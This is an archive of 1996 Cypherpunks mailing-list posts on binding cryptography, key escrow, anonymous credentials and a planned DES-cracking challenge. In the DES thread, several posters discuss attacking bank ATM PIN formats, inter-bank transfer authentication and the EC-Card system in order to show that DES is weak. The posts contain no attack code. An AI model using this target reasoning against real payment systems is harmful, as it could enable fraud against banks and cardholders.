In-Reply-To: <7E159360C2E@frw3.kub.nl>
Message-ID: <32672B38.356D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bert-Jaap Koops wrote:
> Apologies for not reacting earlier; I have been away for six days.
> I found many reactions to the posting on binding cryptograhpy
> in my mail box, which I have read with interest.
> Here are my comments, excuse me if they are lengthy.

[snip]

> Then, you say, it affects my privacy. As far as I see it, it does
> not. The binding cryptography system allows regular monitoring for
> compliance (like road police checking whether people are sober). It
> does not involve reading of messages. The only time messages are read
> is when law-enforcement agencies (LEAs) have a warrant and ask a TRP
> to hand over a session key. This is not fundamentally different from
> the present situation, where LEAs can wiretap with a warrant. Privacy
> will be protected more or less to the same extent as presently.

Seems to me there's a difference between "the only time messages are 
read" and "the only time messages are *supposed* to be read".  Since 
Bert says the former, you have to wonder...   And as far as "regular 
monitoring for compliance" goes, does the Post Office monitor first 
class mail now ("regular monitoring")?  Do they have a monitoring law 
besides the ability to open letters with a warrant?

[snip]

> (And Allen, if binding cryptography helps totalitarian governments in
> arbitrarily monitoring all communications, I oppose this.

I hate to be rude Bert, but for the zillionth time, what you oppose is 
entire irrelevant to this subject, unless you are *the* decision maker 
in designing binding crypto products and making attendant regulations.

> China uses video cameras in Lhasa to monitor potential demonstrations
> of Tibetans. I oppose this, and I blame the Chinese government for it,
> not the inventor of video cameras.)

Well, Bert, who do you blame for the mass of cameras going up all over 
Los Angeles? (Not to mention small, neighborhood microwave transceivers)

> I feel at least that allowing TRPs to decrypt single communications
> if the LEA has a court warrant is better protection than escrowing my
> private key with the government. Also, choosing your own TRP allows
> you better protection than having to use a government-chosen one. On
> the other hand, I think there should be some regulation on TRPs, if
> only to address liability issues. I think a government certification
> of TRPs would not be a bad thing, if this is done in an open,
> flexible and preferably independent way - for instance a
> semi-govenmental "TRP approving authority" (the same way we have data
> protection authorities who monitor compliance with data protection
> legislation). Again, we may have different opinions on this given the
> difference between US and Europe.

In the U.S., there's a thoroughly-implemented concept called co-opting, 
well described in senate hearings on intelligence circa 1974-1976. 
Fortunately, you were able in the above paragraph to get past the 
"choosing your own TRP" clause, and show the real cards.  So where in 
the U.S. are you gonna get TRP's who will not *ever* "leak" your files 
to an interested agency without proper warrant?

> Someone pointed out that a TRP could be corrupted and collaborate
> with the law-enforcement agencies. Then, all sessions would be read
> by the LEA. Indeed, this is a threat to be taken into account.

Whoops!  Looks like I spoke too soon.

> At least the binding alternative is better protection against
> collaborating TRPs than key-escrow, as at least it leaves
> communications from before the corruption unharmed. Moreover, the
> system allow easy change of TRP, so the moment you notice something
> weird about this TRP, you choose another one. It's really a matter of
> trust.

And which trust is that, Bert?  They sure as hell don't trust us, now do 
they?  And unless you can show exactly where and when the "corruption" 
occurred, how do you know what was compromised?

> Finally, I get the impression that some cypherpunks feel the
> law-enforcement problem to be a problem of "them" as opposed to us. I
> - and this is my personal opinion - feel it is "my" problem as well.
> I live in a society with which I am generally satisfied, not the
> least because we have a rule of law. Tracing criminals is my concern
> as well. I am not happy that, in some ways, I have to give up some
> freedom, but I think it is worth while. I would not mind using a
> government-offered crypto system that uses binding cryptography. All
> I want is that it is a good system and I want to be sure I trust my TRP.
> I would prefer it if no such system were needed, but if it helps in
> protecting me from criminals, I can live with it.

How does it protect from criminals?  Only non-criminals (or extremely 
stupid criminals) will submit their data to a third party.

One principle you should keep in mind, Bert, and that is that 
cypherpunks are not merely paranoid (paranoia as a Way Of Knowing), 
they're very adept at telling you exactly how the criminals and 
terrorists will get around this hokum, and you're in denial about it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Thu, 17 Oct 1996 21:40:43 -0700 (PDT)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: DES cracker.
Message-ID: <3.0b36.32.19961018003632.00699af0@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


At 16:30 10/17/96 +0100, Adam Back wrote:
>
>[added cc cypherpunks also]
>
>Sameer Parekh <sameer@c2.org> writes:
>> Peter Trei <trei@process.com> writes:
>> > 	Ideally, this should be a DEMO case of a real world encrypted
>> > application, in which we have a cryptotext, and a known plaintext,
>> > each at least one 8-byte block long.
>> 
>> 	I'd like to get in touch with a bank who can provide us some
>> sample ciphertext for an ATM transaction or something like that. I
>> initially thought we should hit SWIFT, but that would be very
>> illegal. =)
>
>If someone can dig up a selection of banking protocols (some of these
>things must be standardised), perhaps we can simulate the same thing
>without the legal implications.
>
>Of course you'd need the person constructing the challenge to be
>trustworthy to the tune of $10k, or whatever the prize fund pans out
>to be.  For that matter the NSA, or anyone else with a hardware
>breaker would be able to cheat, but then they help our cause, which is
>to demonstrate how weak DES is :-)
>
Tell me what you need.  A large part of my job is providing hardware
security modules to banks to secure (among other things) their ATM networks
(Automated Teller MAchines, not Async Transfer Mode).  Do you need PIN
encryption formats, transmission message protocols, or what?  Just LMK.

 
                                                     G.C.G.

 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 | Geoffrey C. Grabow       |      Great people talk about ideas.       |
 | Oyster Bay, New York     |     Average people talk about things.     |
 | gcg@pb.net               |      Small people talk about people.      |
 |----------------------------------------------------------------------|
 |     PGP 2.6.2 public key available at http://www.pb.net/~wizard      |
 |          and on a plethora of key servers around the world.          |
 |                          Key ID = 0E818EC1                           |
 |   Fingerprint =  A6 7B 67 D7 E9 96 37 7D  E7 16 BD 5E F4 5A B2 E4    |
 |----------------------------------------------------------------------|
 | That which does not kill us, makes us stranger.   - Trevor Goodchild |
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 18 Oct 1996 10:07:39 -0700 (PDT)
To: shamrock@netcom.com
Subject: Re: DES cracker.
In-Reply-To: <Pine.3.89.9610172224.A7082-0100000@netcom9>
Message-ID: <199610180223.DAA00349@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green <shamrock@netcom.com> writes:
> On Fri, 18 Oct 1996, Geoffrey C. Grabow wrote:
> > Tell me what you need.  A large part of my job is providing hardware
> > security modules to banks to secure (among other things) their ATM networks
> > (Automated Teller MAchines, not Async Transfer Mode).  Do you need PIN
> > encryption formats, transmission message protocols, or what?  Just LMK.
> 
> It would be best to attack something that has broader use than just a 
> single pin. At best, that would allow an hostile to clean out a single 
> account. A target that would allow one to attack, say an account held 
> *by* a bank would be more attractive.

Account transfers was what I had in mind also, the higher value
transactions that they are used for, and the more widely used the
better.  So being able to break the authentication on transmission
message protocols, might be enough, if being able to forge the
authenticed payment transfer requests would be possible.

Any protocols you can point us to involving inter-bank or
international transfers would be great, if there are any which are
still using DES rather than 3DES.

Hope these protocols use include known plaintext, either fixed message
parts, or predictable (account numbers), or use an integrity check
which we can also (ab)use.  (Netscape's SSL used (is this still
present in SSL3.0?) such an integrity check and this was the toe hold
for the SSL brute force.)

(As a fall back, ATMs might be useful if the protocol used the same
key to encrypt all PINs.  However, one might hope that the protocols
use diferent DES keys for different PINs.)

Some time ago, there was a Russian guy with some other accoplices who
got caught transferring several millions out of some US banks, this
was in the news, and some news clips were posted to cypherpunks, but
I've never seen the details of how he did it discussed.  Was this an
inside job, or was it black cryptanalysis?

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 18 Oct 1996 10:09:23 -0700 (PDT)
To: aba@dcs.ex.ac.uk
Subject: [CORRECTION] Re: DES cracker.
In-Reply-To: <199610171533.QAA00477@server.test.net>
Message-ID: <199610180227.DAA00352@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young pointed out to me a factor of 8 error in my DES CBC block
timing cacluations (I used megabytes, Erics figures are in megabytes,
Peter's are in mega _bits_, this fact escaped my notice, though I must
say I was very impressed with Peters optimisations :-).

Peter since posted his cool keysched optimisations, which change
things also.

So here's the table revisited (extrapolated to 133Mhz Pentium, from
Peter's 90Mhz to keep it in line with the previously posted table):

keysched = 3.8us
DES cbc = 7.3us

n keys    |  key   |   DES  | elapsed for | elapsed per |
at a time |  sched |   cbc  | n key tests | key test    | keys/sec
-----------------------------------------------------------------------
     1       3.4us    21.9us      25.3us         25.3us    39.5k keys/s
     2       3.4us    43.8us      47.2us         23.6us    42.4k keys/s
     4       3.4us    87.6us      91.0us         22.7us    44.0k keys/s
     8       3.4us   175.2us     178.6us         22.3us    44.8k keys/s
    16       3.4us   350.4us     353.8us         22.1us    45.2k keys/s
    32       3.4us   700.8us     704.2us         22.0us    45.4k keys/s
    64       3.4us  1401.6us    1405.0us         22.0us    45.6k keys/s
   128       3.4us  2803.2us    2806.6us         21.9us    45.6k keys/s

So as you can see this greatly reduces the gains to be made from
multiple keys.  Not worth doing more than 64 keys, and 64 keys only
buys 15% increase in keys/sec.

When Peter adds what he calls the "glue" code in his paper (extra code
to move data, compare results etc), the advantage of multiple keys may
go down further.

Also if the extra code for testing multiple keys pushes the code
requirements over the 8k L1 code cache, or the extra data space pushes
the data over the 8k L1 data cache, this may lose more than is gained.
The extra code complexity will add a small amount of overhead too.

The data requirements for multiple keys aren't that high. (Extra data
is number of blocks required per test x 8 byte block size = 64 x 8 x 3
= 1.5k, or 384 bytes if you restrict yourself to 16 keys at once, and
lose the last 1% gain).

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 17 Oct 1996 20:40:30 -0700 (PDT)
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Q.E.D.
In-Reply-To: <Pine.BSI.3.95.961016194535.21030B-100000@citrine.cyberstation.net>
Message-ID: <Pine.LNX.3.94.961018031600.213A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Oct 1996, IPG Sales wrote:

> 
>          Some of you have sardonically written to say "Nihil Est
>          Demonstrandum," N.E.D. because an OTP must be derived from a
>          hardware source, that is, it must be a pure random sequence
>          of limitless entropy. Accordingly, they unbashfully assert
>          that an OTP generated by a computer program is not possible.
> 
>          How do they know that? Does the Bible tell them so, or the
>          Koran, or do they get it from the Torah? Why not cite the
>          source of their certainty instead of advancing an unsupported
>          proposition.  I do not mean to be rude, but excuse me, what
>          scientific proof can they offer for that immovable avowal?
>          There is no scientific proof whatsoever, none at all, except
>          for the words and their steadfast, and maybe self serving,
>          postulate.  Accordingly, obviously it is they, not us, who are
>          the ones that have "Nihil Est Demonstrandum," in this matter.
>          There is not one scintilla of sustainable evidence to support
>          such a doctrine.
> 

Any algorithmic generation (which all software is) is predictable given
the algorithm.  If its not hardware based, it can be guessed.  This is
altogether obvious.  tough luck.

 --Deviant
Blood flows down one leg and up the other.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 18 Oct 1996 07:12:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDA Net-regulations -- "Drug Lords" from HotWired
Message-ID: <Pine.GSO.3.95.961018071157.9162B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 18 Oct 1996 05:20:19 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: FDA Net-regulations -- "Drug Lords" from HotWired

http://www.netizen.com/netizen/96/42/global4a.html

HotWired
The Netizen

"Drug Lords"

Global Network
by Declan McCullagh (declan@well.com)
Washington, DC, 17 October

   Forget the Communications Decency Act and the censor-happy
   Clinton administration.
   
   Instead, it now seems like we have to keep an eye on the pinstriped
   bureaucrats at the US Food and Drug Administration, who are hatching
   their own schemes to regulate the Net.
   
   I just got back from the agency's two-day conference in the Maryland
   suburbs, entitled "FDA and the Internet: Advertising and Promotion of
   Medical Products." Discussions drifted from troublesome-to-the-Feds
   notions of drug use in America Online chat rooms to emerging
   international Net-regulatory agreements, but all the talk shared a
   kind of benevolent paternalism.
   
   Consumers can't be trusted to make their own choices. The Federal
   government must protect us from reading what only doctors are allowed
   to see. Netizens can't even be trusted to figure out when they're
   leaving a Web site after they click on a link.
   
   Drug industry representatives on the panel this morning appeared less
   than overly concerned with regulatory threats to free speech. Jamie
   Marks from Body Health Resources said: "It's very important that drug
   companies police the sites they link to." The panel also discussed how
   to prevent sites that celebrate or even talk about illicit drug use
   from linking to sites operated by pharmaceutical companies.
   
   Even search engines like AltaVista could be hit by FDA regulations.
   Sara Stein from Stanford University noted, "Search engines have begun
   to sell links ... that's another area of disclosure that's required."
   Translation: the FDA is looking to have a say in how to label medical
   advertisements on Web sites.
   
   The FDA's also working the international angle. They brought in to the
   conference speakers from France, Britain, Switzerland, Brazil, and the
   Netherlands - all of whom were particularly interested in online drug
   promotion, since US advertising laws are currently so permissive.
   
   J. Idanpaan-Heikkila, the World Health Organization's director of drug
   management and policies, said that real-world claims promoting
   pharmaceuticals should be "in good taste," adding, "I think this is
   applicable to the Internet."
   
   Cedric Allenou, the French Embassy's health attache, predicted more
   controls: "In France, as in the United States, there is a lack of
   regulation on the Internet. But these issues will soon be discussed by
   the French government." When asked what his country would do if a US
   server distributes information banned in France, he replied: "If your
   Web site is not in France, you're not under French rule. This is a
   problem with French Internet regulation."
   
   John Rothchild, an attorney from the Federal Trade Commission - which
   will announce its own Net-regulation plan later this year - said:
   "Based on some hasty research I did last night, I can report it is
   feasible to control access to our Web site based on what country the
   accesser is in.... I don't know the technical details, but according
   to the technical people at the FTC, non-US domain names have a
   two-letter suffix."
   
   Rothchild apparently didn't realize that many companies outside the
   United States have domain names ending in nothing but .com.
   
   At the end of the two-day conference, meanwhile, the one question left
   unanswered by attendees was not whether the FDA should regulate the
   Net, but how long it will take them, and how far they'll go.
   
###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crumrig@us-state.gov
Date: Fri, 18 Oct 1996 04:29:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GET ME OUT OF HERE
Message-ID: <Chameleon.961018072457.gary@crumrig.fadpc.im,us-state.gov>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBSCIBE





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Fri, 18 Oct 1996 06:39:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: YES OR NO?
Message-ID: <199610181339.HAA01427@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


The Vulis-bot wrote:

>Sandy Sandfort <sandfort@crl.com> writes:
>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>                           SANDY SANDFORT
>>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>>
>> C'punks,
>>
>> On Thu, 17 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>>
>> > I said: YES, when I have the time.

Unless the "YES" was in private email to Sandy, he lies (again)
about ever having given any form of a straight answer.

>> Great.  So let's pick a date sufficiently in the future that you
>> can make a firm commitment.  For starters, our three winter
>> meetings are tentatively scheduled for December 14, January 11
>> and February 8.  Any of those sound good to you?
>
>Don't know yet.

Prediction/translation: "never"

Sandy, I am not even sure that this is such a good idea...
rewarding the annoying with a free, wintertime trip to CA
with free lodging seems to be a way of encouraging more of
the annoying... The last thing we need. Respected c-punks
are dropping like flies as it is. Perhaps you'll prove me
wrong and shut him up, if he proves me wrong by attending,
that is.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Fri, 18 Oct 1996 08:21:12 -0700 (PDT)
To: hal@rain.org
Subject: Re: Anonymous Auth Certificates [was: Re: Blinded Identities]
Message-ID: <199610181520.IAA05554@crypt>
MIME-Version: 1.0
Content-Type: text/plain


From: azur@netcom.com (Steve Schear)
> It seems that one crux of the problem revolves around the CA and its method
> of certificate issuance.  A CA which uses biometric data to
> reduce/eliminate the chance that an applicant could get several, unrelated,
> certificates issued would provide a basis for negative authentication
> (similar to a negative credit file).

Yes, biometric data is another way of preventing multiple credentials.
However it will not work well in electronic form.  What you'd need would
be a network of stations to take fingerprints and give credentials,
("is a person" credentials) which would then be used for getting access
to other services where you're supposed to only use them once (voting
for example).  This requires a fairly elaborate infrastructure and social
commitment to this solution to the problem.

Somehow too it is hard to see how to sell a system as a privacy enhancement
when its first step is to take fingerprints of the whole country.  "But
we're not saving your names, honest!"  I don't know if it would fly.

Tim May argues that alternative solutions which are more local will be
better.  In the case of the abuse situation, maybe you could just have
people put down a deposit of $100 or so.  Then they get an anonymous
credential which they can use for access.  If they abuse their access,
their credential gets disabled.  As long as their abuse is worth less
than the deposit you'll be OK.  And at any point they can turn in their
valid credential and get their money back.  No identities are needed at
any point in the scheme.

> A one-way function performed, by the client, on their certificate from this
> CA would yield a token which unambiguously binds it to a valid certificate
> of the CA (and therefore uniquely identifies them) w/o revealing the
> certificate itself.

Actually I think you need to use a blinding protocol when you acquire
the certificate, rather than trying to run a one-way function on the
unblinded cert.  The output of a one-way function looks random and
meaningless unless you supply the input.  And if the input identifies
the user then you've lost the anonymity.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 18 Oct 1996 08:16:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Stopping Crime" Necessarily Means Invasiveness
In-Reply-To: <80A3D511B45@frw3.kub.nl>
Message-ID: <v03007800ae8d5ea9748b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 AM +0100 10/18/96, Bert-Jaap Koops wrote:
>"Timothy C. May" <tcmay@got.net> wrote:
>> The recent talk about "catching criminals" misses this point, that
>> governments typically use surveillance powers to control citizens. (Note: I
>> would think Dutch residents should be especially sensitive to this concern,
>> given what happened to them in WW II, when the arriving Nazis used
>> telephone records to locate Jews for extermination. Until recently, Holland
>> had a tendency to carefully think about such issues---I believe phone calls
>> were billed in such a way as to not keep such records, for example).
>
>I suppose this remark is targeted at me and Eric.

And David Chaum, Digicash, etc. And not just Holland, but Europe as well.
And America. The point being that people should carefully consider the uses
to which technology is put. (I agree that one should not "hold back" on
technical/scientific discoveries out of unreasonable fear; my comments were
mainly triggered by your own comments about the "need to catch criminals.")

...
>
>So much for politics. Can we get back to crypto?
>

This "I've said what I want to say and now I want you to shut up" rejoinder
is all too common here on this list. If you only want to talk crypto, go
ahead. But  others of us will discuss what we think is important.

As it happens, I think any of the variants of "government access to keys"
(GAK, key escrow, key recovery, binding cryptography, traceable e-cash,
etc.) are worthy topics of discussion. Pure crypto, absent any
sociopolitical implications, is probably best discussed in
sci.crypt.research, the Crypto and EuroCrypt Conferences, networks of
preprint distribution, and suchlike.

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 18 Oct 1996 08:21:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: GET ME OUT OF HERE
In-Reply-To: <Chameleon.961018072457.gary@crumrig.fadpc.im,us-state.gov>
Message-ID: <v03007801ae8d60d6f792@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:24 AM -0700 10/18/96, crumrig@us-state.gov wrote:
>UNSUBSCIBE


You have been unsubscibed. For good measure, you have also been unscribed,
unsubsribed, and unsuscribed.

In the event that you wished to be _unsubscribed_, only you can do that.
Directions follow at the end of this message.

--Unsubsciber





To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 18 Oct 1996 05:40:06 -0700 (PDT)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: RE: YES OR NO?
Message-ID: <9609188456.AA845653101@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote:
>I said: YES, when I have the time.

If your schedule looks anything like mine, you only have time for something if
you make time for it.

If your YES is to be worth anything, you are going to have to make time.
Will you make the time? If not, a NO would be a more honest response.

Ciao,
James

Never put off until tomorrow what you can put off doing altogether.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 18 Oct 1996 08:43:55 -0700 (PDT)
To: Andreas Bogk <andreas@artcom.de>
Subject: Re: DES cracker.
In-Reply-To: <y8apw2gfyqr.fsf@hertie.artcom.de>
Message-ID: <Pine.3.89.9610180813.A16687-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain



On 18 Oct 1996, Andreas Bogk wrote:

> The EC-Card system, the European standard for ATM cards, is based on
> DES. A single recovered key would suffice to calculate all PINs every
> current EC card, the number of which runs into the tens of millions.

We have a winner! This target is attractive for two reasons:

1. A single key cracked can compromise the entire system.
2. It is a non-US target. Once the key is cracked, the EC-Card system 
would most likely move to 3DES. And the US seems to have no desire to 
allow the export of 3DES.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Fri, 18 Oct 1996 08:32:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Production of ALPHACIPHER for Windows 95 and DOS Cancelled!
In-Reply-To: <199610180358.UAA07899@big.aa.net>
Message-ID: <32674946.45DB@best.com>
MIME-Version: 1.0
Content-Type: text/plain


! Drive wrote:
> 
> This may have already been posted, but I found it interesting...
> 
> from: http://www.aa.net/cyber-survival-hq/
> 
>      Development of the ALPHACIPHER product line has been voluntarily cancelled
> due to the possibility of
>                  non-compliance of users of ALPHACIPHER with the new key escrow
> law.
> 
>

...thank heavens for small favors....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Fri, 18 Oct 1996 08:42:26 -0700 (PDT)
To: Gary Howland <gary@systemics.com>
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
In-Reply-To: <199610121908.OAA19871@homeport.org>
Message-ID: <32674B59.62C4@best.com>
MIME-Version: 1.0
Content-Type: text/plain


<Infomation provided does not imply expression of a political opinion>
<Infomation provided does not imply expression of a political opinion>
<Infomation provided does not imply expression of a political opinion>

That means you would have to take your CAPI implementation and
documentation of it, and distribute it freely in some form (source?)
presumably on the 'net.

Which could be a violation of the terms you get the
signature under.

<Infomation provided does not imply expression of a political opinion>
<Infomation provided does not imply expression of a political opinion>
<Infomation provided does not imply expression of a political opinion>
<Infomation provided does not imply expression of a political opinion>



Gary Howland wrote:
> 
> Ian Goldberg wrote:
> >
> > I remember hearing (if my memory is correct, from the mouth of a Microsoft
> > employee at Crypto '96) that when Microsoft signs a module, they are certifying
> > that they saw a signed sheet of paper swearing that either
> > (1) you won't export the software, or
> > (2) you have received an appropriate export license.
> >
> > AFAIK, they don't even read the code.
> 
> Really?  This implies they would have no objections to signing freely
> available code, which as we all know will eventually make its way
> overseas (indeed, it may have originated there).
> 
> Gary
> --
> "Of course the US Constitution isn't perfect; but it's a lot better
> than what we have now."  -- Unknown.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 18 Oct 1996 09:26:58 -0700 (PDT)
To: "Bert-Jaap Koops" <cypherpunks@toad.com
Subject: Re: "Stopping Crime" Necessarily Means Invasiveness
Message-ID: <199610181626.JAA24098@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 AM 10/18/96 MET, Bert-Jaap Koops wrote:
>At present, I worry more about the threat of (organized) crime than 
>about the threat of government abuse, call it Dutch naivete if you 
>want.
>
>So much for politics. Can we get back to crypto?
>Bert-Jaap

Ah!  So you want to discuss the ARCHITECTURE of those concentration camps, 
rather than the messy details about how they are to be filled, huh?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 18 Oct 1996 06:56:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: POTP critques?
Message-ID: <199610181356.GAA10935@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


An acquaintence of mine works at a firm with little cryptography
experience. They are thinking of including cryptography in a 
future product, and Elementrix's Power One Time Pad is a
serious contestant.

I'm looking for independent critiques of the system, something
better than 'it's not really a one-time pad.' Is the cryptosystem
which is actually implemented worth a damn? Does their claim
to have solved the key distribution problem hold water? I
seem to remember something about them wanting to
generate keys for you, and ship them to the customer. Is this
correct?

Peter Trei
trei@process.com

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 19 Oct 1996 14:39:54 -0700 (PDT)
To: Bert-Jaap Koops <E.J.Koops@kub.nl>
Subject: Re: Comments on binding cryptography (1)
In-Reply-To: <809F2C77EB0@frw3.kub.nl>
Message-ID: <3267B7DA.7D5F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bert-Jaap Koops wrote:
> Dale Thorn <dthorn@gte.net> wrote:

[snip]

> > So where in the U.S. are you gonna get TRP's who will not *ever*
> > "leak" your files to an interested agency without proper warrant?
> [and]
> > They sure as hell don't trust us, now do they?

> This indicates exactly our difference of opinion, which I noticed
> already in my posting. We have different views on governments, so be
> it.

[snip]

> If you can tell me exactly how criminals can get around the
> cryptographic protocol in the way the proposal tries to prevent
> (unilateral fraud), I very much would like to hear so. If you mean
> criminals can agree to use superencryption (or PGP for that matter),
> I don't deny that, as you might have noticed.

So Bert, let's just call a spade a spade, eh?  Since you readily agree 
that organized criminals probably won't use binding crypto, and that 
TRP's will probably leak our info to spy "agencies" and so on, then that 
would make your system yet another of those programs that can't monitor 
organized crime directly, but instead harasses non-criminal citizens in 
the hope that the agencies can eventually get to the criminals via an 
indirect connection, i.e., the citizen happens to buy something at a web 
site run by Crime, Inc. (assuming that Crime, Inc. is not in fact just 
another agency-run sting operation).

As far as fraud is concerned, my main concern is that important (or any) 
documents etc. are not forged, including my personal communications.  
This is particularly important to prevent frame-ups, which run rampant 
in the U.S.  I suppose they don't frame people in your country.  Well, 
it's public knowledge that the Justice Dept. does this sort of thing 
here, so knowing that, are you still suggesting we trust them, simply 
because you trust your government?  Or are you suggesting that with all 
of this new technology, that the U.S. Justice Dept. will evolve into a 
more ethical agency like your govt. allegedly has, instead of the other 
way around?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Fri, 18 Oct 1996 01:03:51 -0700 (PDT)
To: Dale Thorn <cypherpunks@toad.com
Subject: Re: Comments on binding cryptography (1)
Message-ID: <809F2C77EB0@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> wrote:
[many things, including]
> So where in 
> the U.S. are you gonna get TRP's who will not *ever* "leak" your files 
> to an interested agency without proper warrant?
[and]
> They sure as hell don't trust us, now do they?  

This indicates exactly our difference of opinion, which I noticed 
already in my posting. We have different views on governments, so be 
it. 

> cypherpunks are not merely paranoid (paranoia as a Way Of Knowing), 
> they're very adept at telling you exactly how the criminals and 
> terrorists will get around this hokum, and you're in denial about it.
If you can tell me exactly how criminals can get around the 
cryptographic protocol in the way the proposal tries to prevent 
(unilateral fraud), I very much would like to hear so. If you mean 
criminals can agree to use superencryption (or PGP for that matter), 
I don't deny that, as you might have noticed.

Bert-Jaap




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Geoffrey C. Grabow" <gcg@pb.net>
Date: Fri, 18 Oct 1996 07:18:16 -0700 (PDT)
To: Gary Howland <gary@systemics.com>
Subject: Re: DES cracker.
Message-ID: <3.0b36.32.19961018101502.0069a5e4@mail.pb.net>
MIME-Version: 1.0
Content-Type: text/plain


At 13:54 10/18/96 +0200, Gary Howland wrote:
>Geoffrey C. Grabow wrote:
>> 
>
>> Tell me what you need.  A large part of my job is providing hardware
>> security modules to banks to secure (among other things) their ATM networks
>> (Automated Teller MAchines, not Async Transfer Mode).  Do you need PIN
>> encryption formats, transmission message protocols, or what?  Just LMK.
>
